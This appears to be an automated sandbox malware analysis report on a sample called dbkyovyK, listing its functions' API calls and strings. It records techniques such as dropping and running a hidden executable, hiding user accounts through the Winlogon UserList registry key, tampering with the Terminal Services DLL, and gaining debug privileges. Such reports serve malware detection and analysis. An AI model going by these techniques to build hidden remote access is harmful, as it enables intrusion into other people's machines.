Opcode Fuzzy Hash: a35082ab786b2be1e9bdcc843e723a707b6c35561637e304c8583c367d53e484
Instruction Fuzzy Hash: 6A81BF75E002488BDF15DF7488D12E977A2EF89304F15C1BADC595B296EB388982CF98

Uniqueness

Uniqueness Score: -1.00%

Function 00417160 Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 119filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00415DC4: EntryPoint.DBKYOVYK(75A901C2,?,75A901C0,?,?,?,00406B41,75A901C0,?,?,?,?,00000000,.bss,00000000), ref: 00415DDE

Part of subcall function 004043C7: lstrcpyW.KERNEL32(00000000,00000000), ref: 004043EC

Part of subcall function 00406F1D: VirtualFree.KERNELBASE(?,00000000,00008000,00406CE1,00000000,?,00414EA7,?,?,00417742), ref: 00406F25

LoadResource.KERNEL32(00000000,?,00000000), ref: 0041719B
SizeofResource.KERNEL32(00000000,?), ref: 004171A7
LockResource.KERNEL32(00000000), ref: 004171B1
GetTempPathA.KERNEL32(00000400,?), ref: 004171EB
lstrcatA.KERNEL32(?,find.exe), ref: 004171FF
GetTempPathA.KERNEL32(00000400,?), ref: 0041720D
lstrcatA.KERNEL32(?,find.db), ref: 0041721B
CreateFileA.KERNEL32(?,10000000,00000001,00000000,00000002,00000084,00000000), ref: 00417236
WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00417248
CloseHandle.KERNEL32(00000000), ref: 0041724F
wsprintfA.USER32 ref: 0041727F
ShellExecuteExA.SHELL32(0000003C), ref: 004172CD

Strings

<, xrefs: 0041728B
-w %ws -d C -f %s, xrefs: 00417279
find.exe, xrefs: 004171F9
@, xrefs: 0041729E
find.db, xrefs: 0041720F

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: Resource$FilePathTemplstrcat$CloseCreateEntryExecuteFreeHandleLoadLockPointShellSizeofVirtualWritelstrcpywsprintf
String ID: -w %ws -d C -f %s$<$@$find.db$find.exe
API String ID: 2020652593-265381321
Opcode ID: 1d4e9bdc719c0edee56dc38ab0f3273de0979abb5f7734f49339853d3afefa82
Instruction ID: 4e6f789f25c2d73977df06686e7c595a6734515abfe1849490645dae853bdedf
Opcode Fuzzy Hash: 1d4e9bdc719c0edee56dc38ab0f3273de0979abb5f7734f49339853d3afefa82
Instruction Fuzzy Hash: 86411D71D00219ABDB10DFA5DD84EDEBBBCFF89304F1041A6F609A6150D7745A858BA8

Uniqueness

Uniqueness Score: -1.00%

Function 004120E9 Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 191registryCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(?,?,?), ref: 004120F6
DeleteCriticalSection.KERNEL32(?,?,?), ref: 0041210D
EnterCriticalSection.KERNEL32(00553050,?,?), ref: 00412118

Part of subcall function 0041199F: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020119,?,SYSTEM\CurrentControlSet\Services\TermService\Parameters,?,?,?,?,0041213F,?,?), ref: 004119D3
Part of subcall function 0041199F: RegCloseKey.ADVAPI32(?,00000000,ServiceDll,?,?,?,0041213F,?,?), ref: 00411A0D
Part of subcall function 0041199F: RegCloseKey.ADVAPI32(00000000,?,?,0041213F,?,?), ref: 00411A5D

LeaveCriticalSection.KERNEL32(00553050,00000000,00000000,00000000,rpdp,00000000,?,00000000,rudp,?,?), ref: 004121DE

Part of subcall function 00402746: CreateThread.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 0040275B

RegCreateKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList,00000000,00000000,00000000,000F013F,00000000,?,?,00000000,00000000,?,?), ref: 0041229B
RegSetValueExW.ADVAPI32(?,00000000,00000004,00000000,00000004,?,?), ref: 004122B8
RegCloseKey.ADVAPI32(?,?,?), ref: 004122C1
LeaveCriticalSection.KERNEL32(00553050,00000000,?,?), ref: 00412372

Part of subcall function 0040460A: lstrlenW.KERNEL32(00415E06,00000000,?,00415E06,00000000,?,00000000,.bss,00000000,?,75A901C0,00000000), ref: 00404613
Part of subcall function 0040460A: lstrlenW.KERNEL32(00415E06,?,00415E06,00000000,?,00000000,.bss,00000000,?,75A901C0,00000000), ref: 0040462A
Part of subcall function 0040460A: lstrcpyW.KERNEL32(75A901C0,00415E06), ref: 00404649

Part of subcall function 004043C7: lstrcpyW.KERNEL32(00000000,00000000), ref: 004043EC

Part of subcall function 00406F1D: VirtualFree.KERNELBASE(?,00000000,00008000,00406CE1,00000000,?,00414EA7,?,?,00417742), ref: 00406F25

Part of subcall function 00415532: lstrlenW.KERNEL32(00000000,?,?,76ECE820,?,?,?,?), ref: 00415596
Part of subcall function 00415532: lstrcpyW.KERNEL32(00000000,00000000), ref: 004155AC

Part of subcall function 004045F0: lstrlenW.KERNEL32(75A901C0,0040466F,00417610,?,?,004152FA,00417648,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,00417610,?,75A901C0,00000000), ref: 004045F7

LeaveCriticalSection.KERNEL32(00553050,00000000,rpdp,005530B0,00000000,rudp,005530AC,005530AC,005530B0,?,?), ref: 00412342

Strings

h0U, xrefs: 00412331
P0U, xrefs: 00412102
rpdp, xrefs: 00412185, 0041230F
P0U, xrefs: 0041232C
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList, xrefs: 00412291
rudp, xrefs: 0041214D, 004122ED

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: CriticalSection$lstrlen$CloseLeavelstrcpy$Create$DeleteEnterFreeInitializeOpenThreadValueVirtual
String ID: P0U$P0U$SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList$h0U$rpdp$rudp
API String ID: 1029805042-282332285
Opcode ID: b64bd9f6f4febb77aa220a993af8b08b05678c326be1164a356152d87f6d3bcd
Instruction ID: df46b5a374f046203d15ea10fe5e6c6ed29f313ef8744d47ee2c02ce6d6b6379
Opcode Fuzzy Hash: b64bd9f6f4febb77aa220a993af8b08b05678c326be1164a356152d87f6d3bcd
Instruction Fuzzy Hash: BF517670640304BACB10FF61DC66FEE3B69AB44795F00403BFD0AF61E1DB789A598A59

Uniqueness

Uniqueness Score: -1.00%

Function 00411760 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 137registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0040460A: lstrlenW.KERNEL32(00415E06,00000000,?,00415E06,00000000,?,00000000,.bss,00000000,?,75A901C0,00000000), ref: 00404613
Part of subcall function 0040460A: lstrlenW.KERNEL32(00415E06,?,00415E06,00000000,?,00000000,.bss,00000000,?,75A901C0,00000000), ref: 0040462A
Part of subcall function 0040460A: lstrcpyW.KERNEL32(75A901C0,00415E06), ref: 00404649

RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020119,?,SYSTEM\CurrentControlSet\Services\TermService\Parameters,SYSTEM\CurrentControlSet\Services\TermService), ref: 004117A9
RegCloseKey.ADVAPI32(00000000), ref: 004118FF

Part of subcall function 00414D78: RegQueryValueExW.KERNEL32(?,75A901C0,00000000,75A901C0,00000000,00000000,?,00000000,?,?,?,?,0041543B,?,?,00000000), ref: 00414D9B
Part of subcall function 00414D78: EntryPoint.DBKYOVYK(00000000,?,0041543B,?,?,00000000,?,75A901C0,00000000,?,?,?,?,00417610,?), ref: 00414DA8
Part of subcall function 00414D78: RegQueryValueExW.KERNEL32(?,75A901C0,00000000,75A901C0,00000000,00000000,?,0041543B,?,?,00000000,?,75A901C0,00000000), ref: 00414DBF

Part of subcall function 00406F1D: VirtualFree.KERNELBASE(?,00000000,00008000,00406CE1,00000000,?,00414EA7,?,?,00417742), ref: 00406F25

RegCloseKey.ADVAPI32(?,00000000,ImagePath,?), ref: 004117E9
RegCloseKey.ADVAPI32(00000000,00000000,ImagePath,?), ref: 004117FD
StrStrW.SHLWAPI(?,svchost.exe,?,00000000,ImagePath,?), ref: 00411830
StrStrW.SHLWAPI(?,svchost.exe -k), ref: 0041183E
RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020119,00000000), ref: 0041185B
RegCloseKey.ADVAPI32(00000000,00000000,ServiceDll,?), ref: 004118C8

Strings

ImagePath, xrefs: 004117BD
SYSTEM\CurrentControlSet\Services\TermService\Parameters, xrefs: 0041177E
SYSTEM\CurrentControlSet\Services\TermService, xrefs: 0041176E
ServiceDll, xrefs: 00411865
svchost.exe -k, xrefs: 00411836
svchost.exe, xrefs: 0041181C

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: Close$OpenQueryValuelstrlen$EntryFreePointVirtuallstrcpy
String ID: ImagePath$SYSTEM\CurrentControlSet\Services\TermService$SYSTEM\CurrentControlSet\Services\TermService\Parameters$ServiceDll$svchost.exe$svchost.exe -k
API String ID: 997040676-3333427388
Opcode ID: f63a9e6c2ac6308715e023630bacc4c3f0fbab4456c8182adc1b0bbf7c49be68
Instruction ID: f9d7e50f13234d9349bd073cc46440ef12e3ec0664d3545fe26421ba8278a848
Opcode Fuzzy Hash: f63a9e6c2ac6308715e023630bacc4c3f0fbab4456c8182adc1b0bbf7c49be68
Instruction Fuzzy Hash: 00413A71E00219EBDF14EFD1D992AEEB7B8EF44745F20406AE502722A1DB785E44CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00411F55 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 123sleepCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00553050,?,?), ref: 00411F75

Part of subcall function 004114F4: OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000005,00553050,?,?,?,?,?,?,?,?,?,00411F8E,?,?), ref: 0041151D
Part of subcall function 004114F4: EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000003,00000000,00000000,?,?,00411F8E,00000000), ref: 00411554
Part of subcall function 004114F4: EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000003,00000000,?,?,?,00411F8E,00000000), ref: 0041157D
Part of subcall function 004114F4: GetLastError.KERNEL32 ref: 00411587
Part of subcall function 004114F4: CloseServiceHandle.ADVAPI32(00000000), ref: 00411595

GetCurrentProcess.KERNEL32(SeDebugPrivilege,?,?), ref: 00411FA7

Part of subcall function 004132F4: OpenProcessToken.ADVAPI32(00000000,00000028,?,74DF0F00,00000000), ref: 0041331F
Part of subcall function 004132F4: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,?), ref: 00413330
Part of subcall function 004132F4: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,?,?), ref: 00413366

Part of subcall function 00406F1D: VirtualFree.KERNELBASE(?,00000000,00008000,00406CE1,00000000,?,00414EA7,?,?,00417742), ref: 00406F25

Part of subcall function 00414AC7: OpenProcess.KERNEL32(00000001,00000000,?,?,00403AD7), ref: 00414ACD
Part of subcall function 00414AC7: TerminateProcess.KERNEL32(00000000,00000000,?,?,00403AD7), ref: 00414ADD
Part of subcall function 00414AC7: CloseHandle.KERNEL32(00000000,?,?,00403AD7), ref: 00414AE6

Sleep.KERNEL32(000003E8,?,?), ref: 00411FD4
Sleep.KERNEL32(000001F4,00553088,?,rpdp,rudp,?,%SystemRoot%\System32\termsrv.dll,?,?), ref: 004120AD
Sleep.KERNEL32(000001F4,00553078,?,rpdp,rudp,?,%SystemRoot%\System32\termsrv.dll,?,?), ref: 004120BA
LeaveCriticalSection.KERNEL32(00553050,00000000,?,rpdp,rudp,?,%SystemRoot%\System32\termsrv.dll,?,?), ref: 004120D0

Part of subcall function 0040460A: lstrlenW.KERNEL32(00415E06,00000000,?,00415E06,00000000,?,00000000,.bss,00000000,?,75A901C0,00000000), ref: 00404613
Part of subcall function 0040460A: lstrlenW.KERNEL32(00415E06,?,00415E06,00000000,?,00000000,.bss,00000000,?,75A901C0,00000000), ref: 0040462A
Part of subcall function 0040460A: lstrcpyW.KERNEL32(75A901C0,00415E06), ref: 00404649

Strings

P0U, xrefs: 00411FE4
P0U, xrefs: 00411F6F
SeDebugPrivilege, xrefs: 00411F98
rpdp, xrefs: 0041201F
%SystemRoot%\System32\termsrv.dll, xrefs: 00411FD6
rudp, xrefs: 00411FF7

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: Process$OpenSleep$CloseCriticalEnumHandleSectionServicesStatusTokenlstrlen$AdjustCurrentEnterErrorFreeLastLeaveLookupManagerPrivilegePrivilegesServiceTerminateValueVirtuallstrcpy
String ID: %SystemRoot%\System32\termsrv.dll$P0U$P0U$SeDebugPrivilege$rpdp$rudp
API String ID: 2130533607-1568026415
Opcode ID: 86db682096b5adeca6a1cdee27a0cf144410155d49e1954365d9674f15bdf774
Instruction ID: c5043a7c0540db9b1c8509392f4cb061a469d66a6b8322cc5fdd09f24fd61cc8
Opcode Fuzzy Hash: 86db682096b5adeca6a1cdee27a0cf144410155d49e1954365d9674f15bdf774
Instruction Fuzzy Hash: 8B410231A00305A7CB14FBA6D81AADEB765AF90359F00002EF505672E1EF7C5E80CA9D

Uniqueness

Uniqueness Score: -1.00%

Function 00410EE9 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 71serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001), ref: 00410EFC
OpenServiceW.ADVAPI32(00000000,?,00000001), ref: 00410F15
CloseServiceHandle.ADVAPI32(00000000), ref: 00410F22
QueryServiceConfigW.ADVAPI32(00000000,00000000,00000000,?), ref: 00410F31
GetLastError.KERNEL32 ref: 00410F3B
QueryServiceConfigW.ADVAPI32(00000000,00000000,?,?), ref: 00410F5C
CloseServiceHandle.ADVAPI32(00000000), ref: 00410F6D
CloseServiceHandle.ADVAPI32(00000000), ref: 00410F70
CloseServiceHandle.ADVAPI32(00000000), ref: 00410F80
CloseServiceHandle.ADVAPI32(00000000), ref: 00410F83

Part of subcall function 00401014: GetProcessHeap.KERNEL32(00000000,00000000,00415E1C,00000000,00000000,00000000,?,00000000,.bss,00000000,?,75A901C0,00000000), ref: 0040101A
Part of subcall function 00401014: RtlFreeHeap.NTDLL(00000000,?,75A901C0,00000000), ref: 00401021

Strings

ServicesActive, xrefs: 00410EF3

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$ConfigHeapOpenQuery$ErrorFreeLastManagerProcess
String ID: ServicesActive
API String ID: 1929760286-3071072050
Opcode ID: edd9816df81df5b4c518a981363bbede884161eedf4f4111940e2c01bad99229
Instruction ID: 32dc36d5f5b496a3ba8f9a593568569b207b35e658ed350b062c88d6c8539b9a
Opcode Fuzzy Hash: edd9816df81df5b4c518a981363bbede884161eedf4f4111940e2c01bad99229
Instruction Fuzzy Hash: 1D116071A00114BBDB209B62DC49DDF7F6CEF89754B108026F905E3220DBB89E81DBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00411A69 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 345COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00411A88

Part of subcall function 004138EF: GetCurrentProcess.KERNEL32(?,?,00403D7B,000010AD,?), ref: 004138F3

PathFileExistsW.SHLWAPI(?), ref: 00411C42

Part of subcall function 00413EF9: SetFilePointer.KERNEL32(?,00000000,00000000,00000002,?,?,00000000,?,?,00403932,?,?,?,40000000), ref: 00413F1A
Part of subcall function 00413EF9: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,?,?,00403932,?,?,?,40000000), ref: 00413F30
Part of subcall function 00413EF9: ReleaseMutex.KERNEL32(?,?,?,00000000,?,?,00403932,?,?,?,40000000,?,?,00000000,?,?), ref: 00413F40

Part of subcall function 00413EE1: CloseHandle.KERNEL32(?,?,00413C1E,00417602,00406CA0,00417602,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 00413EED

PathFileExistsW.SHLWAPI(?), ref: 00411AA6

Part of subcall function 00413B2F: CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000001,00000000,00000000,?,?,?,0040BEEB), ref: 00413B46
Part of subcall function 00413B2F: GetLastError.KERNEL32(?,?,?,0040BEEB), ref: 00413B54

LeaveCriticalSection.KERNEL32(?,00000000,00000001), ref: 00411E73

Part of subcall function 0041141F: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000102,?,SYSTEM\CurrentControlSet\Services\TermService\Parameters,74DF0F00,?,?,?,00411FEE,?,%SystemRoot%\System32\termsrv.dll,?,?), ref: 0041144E
Part of subcall function 0041141F: RegCloseKey.ADVAPI32(?,?,?,00411FEE,?,%SystemRoot%\System32\termsrv.dll,?,?), ref: 004114BB
Part of subcall function 0041141F: RegCloseKey.ADVAPI32(00000000,?,?,00411FEE,?,%SystemRoot%\System32\termsrv.dll), ref: 004114E9

GetCurrentProcess.KERNEL32(SeDebugPrivilege), ref: 00411D34
LeaveCriticalSection.KERNEL32(?,00000000,00000001), ref: 00411E93

Strings

SeDebugPrivilege, xrefs: 00411D24

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: File$CloseCriticalSection$CurrentExistsLeavePathProcess$CreateEnterErrorHandleLastMutexOpenPointerReleaseWrite
String ID: SeDebugPrivilege
API String ID: 2455031922-2896544425
Opcode ID: c00594edc114bf63e991a06b815aeebbec277ac0249f0816691a052bd45251a8
Instruction ID: 70348d295ef9e444fbba74f1f01e48df938b2e51350c0cf20e32ba717bcfdc05
Opcode Fuzzy Hash: c00594edc114bf63e991a06b815aeebbec277ac0249f0816691a052bd45251a8
Instruction Fuzzy Hash: A8C14271504306ABC704FF61D891DEFB7A9BF94308F00052EF65693191EB78EA85CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 39CD002A Relevance: 17.6, Strings: 14, Instructions: 71COMMON

Download Yara Rule

Strings

.ico, xrefs: 39CD00B6
.exe, xrefs: 39CD00C7
.com, xrefs: 39CF9753
.exe, xrefs: 39CD00E6
.cmd, xrefs: 39CD00ED
.lnk, xrefs: 39CD00A5
.pif, xrefs: 39CD0094
.ico, xrefs: 39CD0102
.bat, xrefs: 39CD006E
.lnk, xrefs: 39CD00FB
.cmd, xrefs: 39CD0083
.bat, xrefs: 39CF975D
.pif, xrefs: 39CD00F4
.com, xrefs: 39CD0059

Memory Dump Source

Source File: 0000000E.00000002.2908080372.0000000039CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 39CB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_39cb0000_dbkyovyK.jbxd

Similarity

API ID:
String ID: .bat$.bat$.cmd$.cmd$.com$.com$.exe$.exe$.ico$.ico$.lnk$.lnk$.pif$.pif
API String ID: 0-4016369832
Opcode ID: d49b5eda4472c539226bc993e276aae8c3dee687200f78fb2b8d6123f11d9efc
Instruction ID: dbabc66fa7fec18a1d0f37df521165a3440843f569b90b73e48f6e6b56c70c44
Opcode Fuzzy Hash: d49b5eda4472c539226bc993e276aae8c3dee687200f78fb2b8d6123f11d9efc
Instruction Fuzzy Hash: 8421E7246107469BEB04DB6DFC216AF72A59F11780B818435CA11EF580FAB0FD06D3D1

Uniqueness

Uniqueness Score: -1.00%

Function 00411906 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 54networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202,?), ref: 0041191E
socket.WS2_32(00000002,00000001,00000006), ref: 00411936
inet_addr.WS2_32(127.0.0.1), ref: 0041194C
htons.WS2_32(00000D3D), ref: 0041195A
connect.WS2_32(00000000,?,00000010), ref: 0041196B
closesocket.WS2_32(00000000), ref: 00411977
WSACleanup.WS2_32 ref: 0041197D
closesocket.WS2_32(00000000), ref: 00411985
WSACleanup.WS2_32 ref: 00411992

Strings

127.0.0.1, xrefs: 00411943

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: Cleanupclosesocket$Startupconnecthtonsinet_addrsocket
String ID: 127.0.0.1
API String ID: 2346950895-3619153832
Opcode ID: 6e6967622e8ea4dc3244a01116607c1ab419a8f5497867df8aadd757e8b0189e
Instruction ID: d867726ba5a21d0eacc395251eb76cf95ab2d3a9397328059e984d5596912f7c
Opcode Fuzzy Hash: 6e6967622e8ea4dc3244a01116607c1ab419a8f5497867df8aadd757e8b0189e
Instruction Fuzzy Hash: A101C072600208ABD71067B4AC1DBEB7778EB8DB21F004626FA32C11F0D7348D45CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00414AF5 Relevance: 16.6, APIs: 11, Instructions: 146stringprocessCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00414B3B
Process32FirstW.KERNEL32(00000000,0000022C), ref: 00414B54
OpenProcess.KERNEL32(00001410,00000000,?,?), ref: 00414B89
K32GetModuleFileNameExW.KERNEL32(00000000,00000000,?,00000208), ref: 00414BBF
CloseHandle.KERNEL32(00000000,00000000,00419E40), ref: 00414C12
lstrlenW.KERNEL32(00000000), ref: 00414C53
lstrcpyW.KERNEL32(00000000,00000000), ref: 00414C6C
lstrlenW.KERNEL32(00000000), ref: 00414C7F
lstrcpyW.KERNEL32(00000000,00000000), ref: 00414C98
Process32NextW.KERNEL32(00000000,0000022C), ref: 00414CB6
CloseHandle.KERNEL32(00000000), ref: 00414CC8

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: CloseHandleProcess32lstrcpylstrlen$CreateFileFirstModuleNameNextOpenProcessSnapshotToolhelp32
String ID:
API String ID: 3831308611-0
Opcode ID: 3f86d504f3e009ed6d5cd94626582a2320bfb87e33d9661639e5b1fafa7d9d47
Instruction ID: 805f479f8ea1a609f8a56136dc53d6e4d91679cea641a0cb0dfe928ae8fd9066
Opcode Fuzzy Hash: 3f86d504f3e009ed6d5cd94626582a2320bfb87e33d9661639e5b1fafa7d9d47
Instruction Fuzzy Hash: EC516271900209AFDB00EFA0DC99BEEBB78AF44315F10417AE506B61D1EB785E84CF58

Uniqueness

Uniqueness Score: -1.00%

Function 39D20C08 Relevance: 16.4, Strings: 13, Instructions: 165COMMON

Download Yara Rule

Strings

%hs(%d) tid(%x) %08X %ws, xrefs: 39D20D57
LogHr, xrefs: 39D20C9A
(caller: %p) , xrefs: 39D20D2C
%hs!%p: , xrefs: 39D20D12
Exception, xrefs: 39D20CB2
FailFast, xrefs: 39D20C8E
CallContext:[%hs] , xrefs: 39D20DAB
[%hs(%hs)], xrefs: 39D20DC6
%hs(%u)\%hs!%p: , xrefs: 39D20D01
Msg:[%ws] , xrefs: 39D20D93
, xrefs: 39D20D7B
ReturnHr, xrefs: 39D20CA6
[%hs], xrefs: 39D20DE0

Memory Dump Source

Source File: 0000000E.00000002.2908080372.0000000039CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 39CB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_39cb0000_dbkyovyK.jbxd

Similarity

API ID:
String ID: $%hs!%p: $%hs(%d) tid(%x) %08X %ws$%hs(%u)\%hs!%p: $(caller: %p) $CallContext:[%hs] $Exception$FailFast$LogHr$Msg:[%ws] $ReturnHr$[%hs(%hs)]$[%hs]
API String ID: 0-3173542853
Opcode ID: 19ee22753f3609c2361d81e0b0d2cda21c404f7302301c67a6be3fc7fce63be8
Instruction ID: e0f159921f76e8409c2f1c4c657fff916b43396332e0de3c794ae49923e101d9
Opcode Fuzzy Hash: 19ee22753f3609c2361d81e0b0d2cda21c404f7302301c67a6be3fc7fce63be8
Instruction Fuzzy Hash: B651E0B5800300EFDF205F65EC4AE67B7B9EB98308F40C99DF5C6A6921D631A581CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 004037E6 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 130stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00404656: lstrcpyW.KERNEL32(00000000,75A901C0), ref: 00404680

Part of subcall function 004045F0: lstrlenW.KERNEL32(75A901C0,0040466F,00417610,?,?,004152FA,00417648,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,00417610,?,75A901C0,00000000), ref: 004045F7

Part of subcall function 00406F1D: VirtualFree.KERNELBASE(?,00000000,00008000,00406CE1,00000000,?,00414EA7,?,?,00417742), ref: 00406F25

GetTempPathW.KERNEL32(00000104,?,?), ref: 00403826

Part of subcall function 0040460A: lstrlenW.KERNEL32(00415E06,00000000,?,00415E06,00000000,?,00000000,.bss,00000000,?,75A901C0,00000000), ref: 00404613
Part of subcall function 0040460A: lstrlenW.KERNEL32(00415E06,?,00415E06,00000000,?,00000000,.bss,00000000,?,75A901C0,00000000), ref: 0040462A
Part of subcall function 0040460A: lstrcpyW.KERNEL32(75A901C0,00415E06), ref: 00404649

Part of subcall function 004043C7: lstrcpyW.KERNEL32(00000000,00000000), ref: 004043EC

Part of subcall function 00404477: wsprintfW.USER32 ref: 00404492

Part of subcall function 00413F4F: CreateFileW.KERNEL32(?,?,00000001,00000000,00000003,00000000,00000000,?,?,?,00403915,40000000,?,?,00000000,?), ref: 00413F65
Part of subcall function 00413F4F: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00403915,40000000,?,?,00000000,?,?,?), ref: 00413F75

lstrlenW.KERNEL32(00000000,?,?,?,?), ref: 00403896
lstrcpyW.KERNEL32(00000000,00000000), ref: 004038AE
lstrlenW.KERNEL32(00000000,?,00000000,?,?,?), ref: 004038C9
lstrcpyW.KERNEL32(00000000,00000000), ref: 004038E1
PathFileExistsW.SHLWAPI(00000000,?,00000000,?,?,?), ref: 004038F2
ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000005), ref: 0040395D

Strings

open, xrefs: 00403957
.exe, xrefs: 00403857

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen$File$Path$CreateExecuteExistsFreeShellSizeTempVirtualwsprintf
String ID: .exe$open
API String ID: 2722316208-49952409
Opcode ID: 0f701997c67fe6bc3aa63739eb8565e9086678d50e77cc7f54ed9e4bdc6f3a5a
Instruction ID: 0d9b384c0987c013788bdd12c9207a0153c310f9bc5cd82eb46eadee2747ca6f
Opcode Fuzzy Hash: 0f701997c67fe6bc3aa63739eb8565e9086678d50e77cc7f54ed9e4bdc6f3a5a
